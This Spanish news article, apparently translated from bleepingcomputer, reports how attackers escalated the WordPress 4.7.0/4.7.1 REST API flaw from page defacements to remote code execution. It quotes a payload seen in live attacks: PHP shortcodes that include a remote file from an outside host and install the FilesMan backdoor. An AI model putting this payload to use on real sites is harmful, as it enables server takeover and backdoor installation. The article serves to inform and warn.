Los atacantes han encontrado una manera de escalar la falla de WordPress REST API y usarla para obtener acceso completo al servidor de una víctima mediante la instalación de una puerta trasera oculta.
WordPress 4.7.2 soluciona la vulnerabilidad en la API REST de WordPress. Descubierto por Sucuri, esta falla afectó a WordPress 4.7.0 y 4.7.1 y permitió un atacante crear solicitudes HTTP maliciosas que cuando se envían a un sitio de WordPress le permitiría al hacker eludir los métodos de autenticación y modificar el título y el contenido de blogs y paginas estáticas.Debido a que el equipo de WordPress temía que los atacantes podrían aprovecharse de este problema de inmediato, no se incluyen detalles sobre el error en el anuncio original y sólo reveló su presencia después de una semana, después de un número importante de usuarios han actualizado sus blogs.
No obstante, como se había previsto, justo después del fallo se hizo público, los piratas comenzaron a atacar sitios de WordPress que no han sido actualizados, con ataques de ir en una semana a partir de 67.000 páginas desfiguradas a más de 2 millones.
La gran mayoría de estos ataques había sido desfiguraciones sencillos, en los que las tripulaciones de piratería simplemente garabateó su nombre en un sitio, y nada más.
Hacia el final de la semana pasada, las cosas se pusieron feas, según la firma de seguridad de WordPress Sucuri, quien informó haber visto los primeros ataques que también participan de código remoto intentos de ejecución.
De acuerdo con Sucuri , los atacantes fueron elaborando mensajes especiales desfiguración que incluían una lista de códigos cortos WordPress.
Después de un vistazo más de cerca a estos códigos cortos, el equipo se dio cuenta que estos fueron los códigos cortos de plugins de WordPress permitieron a los webmasters incluir código PHP personalizado dentro del contenido de texto de sus páginas, y tienen el motor de WordPress ejecutarlo.
En términos más simples, los atacantes encontraron una manera de enviar su propio código PHP para sitios de WordPress a través de la falla API REST, que hasta entonces sólo se utiliza para modificar el texto preexistente.
content:"[insert_php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/insert_php]
[php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/php]",
"id":"61a"}
El fragmento de código fuente de arriba, ha sido visto en ataques en vivo, diría que el motor de WordPress para ejecuta el siguiente comando PHP cada vez que un usuario podría acceder a esa página en particular. include('http[:]//acommeamour.fr/tmp/xx.php');
Esta línea de código PHP incluiría un archivo PHP remoto en el sitio de la víctima, lo que descarga e instalar la puerta de atrás FilesMan PHP en la carpeta de WordPress /wp-content/uploads/.
Después de enviar su solicitud HTTP a WordPress API REST de un sitio, un atacante sólo tendría que acceder a la página de borrado una vez, y luego acceder a la puerta de atrás y tomar el control de servidor subyacente de la víctima.
Fecha actualización el 2021-2-13. Fecha publicación el 2017-2-13. Categoría: Wordpress. Autor: Oscar olg Mapa del sitio Fuente: bleepingcomputer